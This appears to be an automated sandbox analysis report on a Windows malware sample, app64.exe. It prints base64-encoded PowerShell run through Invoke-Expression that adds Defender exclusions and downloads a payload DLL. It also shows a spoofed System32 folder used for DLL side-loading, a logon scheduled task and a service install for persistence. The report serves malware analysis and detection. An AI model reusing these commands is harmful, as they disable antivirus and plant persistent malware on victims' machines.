Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\console_zero.exe Section loaded: libcurl.dll
Source: C:\Windows\System32\console_zero.exe Section loaded: zlib1.dll
Source: C:\Windows\System32\console_zero.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\console_zero.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\console_zero.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\timeout.exe Section loaded: version.dll
Source: C:\Windows\System32\timeout.exe Section loaded: version.dll
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: app64.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: app64.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: C:\Program Files\vcpkg\buildtrees\curl\x64-windows-rel\lib\libcurl.pdb source: svchost.exe, 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 00000022.00000002.2596284562.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 0000002C.00000002.2623137940.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: vcruntime140d.amd64.pdb source: vcruntime140d.dll.13.dr
Source: Binary string: vcruntime140d.amd64.pdb,,, source: vcruntime140d.dll.13.dr
Source: Binary string: C:\Program Files\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb## source: svchost.exe, 0000001C.00000002.3270413285.00007FF8BA24F000.00000002.00000001.01000000.0000000E.sdmp, console_zero.exe, 00000022.00000002.2597062876.00007FF8BA24F000.00000002.00000001.01000000.0000000E.sdmp, console_zero.exe, 0000002C.00000002.2623385168.00007FF8BA24F000.00000002.00000001.01000000.0000000E.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libcrypto-3-x64.pdb source: svchost.exe, 0000001C.00000002.3269556745.00007FF8A7DCB000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\Release\libpq\libpq.pdb source: svchost.exe, 0000001C.00000002.3270312205.00007FF8B8B18000.00000002.00000001.01000000.0000000D.sdmp, libpq.dll.13.dr
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\Release\libpq\libpq.pdbJJ source: svchost.exe, 0000001C.00000002.3270312205.00007FF8B8B18000.00000002.00000001.01000000.0000000D.sdmp, libpq.dll.13.dr
Source: Binary string: C:\Program Files\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb source: svchost.exe, 0000001C.00000002.3270413285.00007FF8BA24F000.00000002.00000001.01000000.0000000E.sdmp, console_zero.exe, 00000022.00000002.2597062876.00007FF8BA24F000.00000002.00000001.01000000.0000000E.sdmp, console_zero.exe, 0000002C.00000002.2623385168.00007FF8BA24F000.00000002.00000001.01000000.0000000E.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libssl-3-x64.pdb source: svchost.exe, 0000001C.00000002.3270048579.00007FF8A9360000.00000002.00000001.01000000.0000000F.sdmp, libssl-3-x64.dll.13.dr
Source: Binary string: ucrtbased.pdb source: ucrtbased.dll.13.dr
Source: Binary string: PrintUI.pdb source: xcopy.exe, 00000008.00000002.2186107127.000001C43773B000.00000004.00000020.00020000.00000000.sdmp, printui.exe, 0000000A.00000002.2213277015.00007FF67A0E2000.00000002.00000001.01000000.00000007.sdmp, printui.exe, 0000000D.00000002.2687703393.00007FF67A0E2000.00000002.00000001.01000000.00000007.sdmp, printui.exe, 0000000D.00000000.2216782494.00007FF67A0E2000.00000002.00000001.01000000.00000007.sdmp, printui.exe.8.dr
Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libssl-3-x64.pdb{{ source: svchost.exe, 0000001C.00000002.3270048579.00007FF8A9360000.00000002.00000001.01000000.0000000F.sdmp, libssl-3-x64.dll.13.dr
Source: Binary string: PrintUI.pdbGCTL source: xcopy.exe, 00000008.00000002.2186107127.000001C43773B000.00000004.00000020.00020000.00000000.sdmp, printui.exe, 0000000A.00000002.2213277015.00007FF67A0E2000.00000002.00000001.01000000.00000007.sdmp, printui.exe, 0000000D.00000002.2687703393.00007FF67A0E2000.00000002.00000001.01000000.00000007.sdmp, printui.exe, 0000000D.00000000.2216782494.00007FF67A0E2000.00000002.00000001.01000000.00000007.sdmp, printui.exe.8.dr

Data Obfuscation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String('JGNvdW50ZXIgPSAwOw0KJHB5bFBhdGggPSAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIjsNCmZvciAoOzspew0KCWlmICgkY291bnRlciAtbGUgMyl7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbG
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMz
Source: unknown Process created: cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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')); Invoke-Expression $decoded;"
Source: C:\Windows \System32\printui.exe Process created: cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $decoded;"
Source: C:\Users\user\Desktop\app64.exe Process created: cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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')); Invoke-Expression $decoded;"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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')); Invoke-Expression $decoded;"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $decoded;"
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B83AFC30 GetModuleHandleW,GetProcAddress,wcspbrk,LoadLibraryW,GetProcAddress,GetSystemDirectoryW,malloc,GetSystemDirectoryW,LoadLibraryW,free, 28_2_00007FF8B83AFC30
Source: app64.exe Static PE information: section name: .xdata
Source: pyld.dll.3.dr Static PE information: section name: .xdata
Source: libiconv-2.dll.13.dr Static PE information: section name: .xdata
Source: libiconv-2.dll.13.dr Static PE information: section name: /4
Source: libiconv-2.dll.13.dr Static PE information: section name: /19
Source: libiconv-2.dll.13.dr Static PE information: section name: /31
Source: libiconv-2.dll.13.dr Static PE information: section name: /45
Source: libiconv-2.dll.13.dr Static PE information: section name: /57
Source: libiconv-2.dll.13.dr Static PE information: section name: /70
Source: libiconv-2.dll.13.dr Static PE information: section name: /81
Source: libiconv-2.dll.13.dr Static PE information: section name: /92
Source: libintl-9.dll.13.dr Static PE information: section name: .xdata
Source: libintl-9.dll.13.dr Static PE information: section name: /4
Source: libintl-9.dll.13.dr Static PE information: section name: /19
Source: libintl-9.dll.13.dr Static PE information: section name: /31
Source: libintl-9.dll.13.dr Static PE information: section name: /45
Source: libintl-9.dll.13.dr Static PE information: section name: /57
Source: libintl-9.dll.13.dr Static PE information: section name: /70
Source: libintl-9.dll.13.dr Static PE information: section name: /81
Source: libintl-9.dll.13.dr Static PE information: section name: /92
Source: libwinpthread-1.dll.13.dr Static PE information: section name: .xdata
Source: console_zero.exe.13.dr Static PE information: section name: .fptable
Source: vcruntime140d.dll.13.dr Static PE information: section name: _RDATA
Source: usvcldr64.dat.13.dr Static PE information: section name: .fptable
Source: x590769.dat.13.dr Static PE information: section name: .fptable
Source: C:\Users\user\Desktop\app64.exe Code function: 0_2_00007FF7DF117338 pushfq ; retf 0_2_00007FF7DF117339
Source: C:\Users\user\Desktop\app64.exe Code function: 0_2_00007FF7DF117393 push rbp; retf 0_2_00007FF7DF1173C3
Source: C:\Users\user\Desktop\app64.exe Code function: 0_2_00007FF7DF1177EE push rax; retf 0_2_00007FF7DF1177F2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF848FF0DB6 push es; ret 3_2_00007FF848FF0DB7
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_00007FF848E1D2A5 pushad ; iretd 16_2_00007FF848E1D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_00007FF848F332F2 pushad ; retf 16_2_00007FF848F33329
Source: C:\Windows\System32\svchost.exe Code function: 28_2_649487B2 push r11; ret 28_2_649487ED
Source: C:\Windows\System32\svchost.exe Code function: 28_2_660224A8 push rax; retf 28_2_660224B1
Source: C:\Windows\System32\svchost.exe Code function: 28_2_6829984B push 00000000h; retf 28_2_68299850
Source: C:\Windows\System32\svchost.exe Code function: 28_2_682970AC push rax; iretd 28_2_682970AD
Source: C:\Windows\System32\svchost.exe Code function: 28_2_682951B2 push rdx; retn 0000h 28_2_682951B3
Source: C:\Windows\System32\svchost.exe Code function: 28_2_6829998B push 00000000h; ret 28_2_68299990
Source: C:\Windows\System32\svchost.exe Code function: 28_2_6829999B push 00000000h; iretd 28_2_682999A0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_6829AA73 push 00000000h; ret 28_2_6829AA78
Source: C:\Windows\System32\svchost.exe Code function: 28_2_6829ABBB push 00000000h; retf 28_2_6829ABC0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_6829ABB3 push 00000000h; ret 28_2_6829ABB8
Source: C:\Windows\System32\svchost.exe Code function: 28_2_6829A7AB push 00000000h; iretd 28_2_6829A7B0
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92EC2D0 push 680001C2h; retn 0001h 28_2_00007FF8A92EC2D5
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92EC2C8 push 680001C2h; retn 0001h 28_2_00007FF8A92EC2CD
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8A92EC2B8 push 050001C2h; retn 0001h 28_2_00007FF8A92EC2C5
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B83ACC08 push rdi; retn 0004h 28_2_00007FF8B83ACC09
Source: C:\Windows\System32\svchost.exe Code function: 28_2_00007FF8B83ACC0C push rdx; ret 28_2_00007FF8B83ACC0D
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B83ACC08 push rdi; retn 0004h 34_2_00007FF8B83ACC09
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B83ACC0C push rdx; ret 34_2_00007FF8B83ACC0D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 40_2_00007FF8479CD08A push eax; retf 40_2_00007FF8479CD08B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 40_2_00007FF8479C5F3B push FFFFFFE8h; ret 40_2_00007FF8479C5FF9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 40_2_00007FF8479C5EF2 push FFFFFFE8h; ret 40_2_00007FF8479C5FF9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 40_2_00007FF8479CCE62 pushad ; retf 40_2_00007FF8479CCE63
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 40_2_00007FF8479CBDDD pushad ; retf 40_2_00007FF8479CBF03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 40_2_00007FF8479CBD2D pushad ; retf 40_2_00007FF8479CBF03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 40_2_00007FF8479CBC7D push esp; retf 40_2_00007FF8479CBC2C

Persistence and Installation Behavior

Source: C:\Windows\System32\reg.exe Key value created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\x590769\Parameters ServiceDll C:\Windows\System32\x590769.dat
Source: C:\Windows\System32\cmd.exe Executable created and started: C:\Windows\System32\console_zero.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Executable created and started: C:\Windows \System32\printui.exe
Source: C:\Windows\System32\xcopy.exe File created: C:\Windows \System32\printui.exe
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libcurl.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\x590769.dat
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\vcruntime140d.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libiconv-2.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libcrypto-3-x64.dll
Source: C:\Windows\System32\cmd.exe File created: C:\Windows \System32\printui.dll (copy)
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libssl-3-x64.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\console_zero.exe
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\usvcldr64.dat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\pyld.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libwinpthread-1.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libintl-9.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\zlib1.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\ucrtbased.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libpq.dll

Boot Survival

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\pyld.dll
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\reg.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\x590769\Parameters
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create x590769 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX (identical event recorded 4 times for cmd.exe; repeats collapsed)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
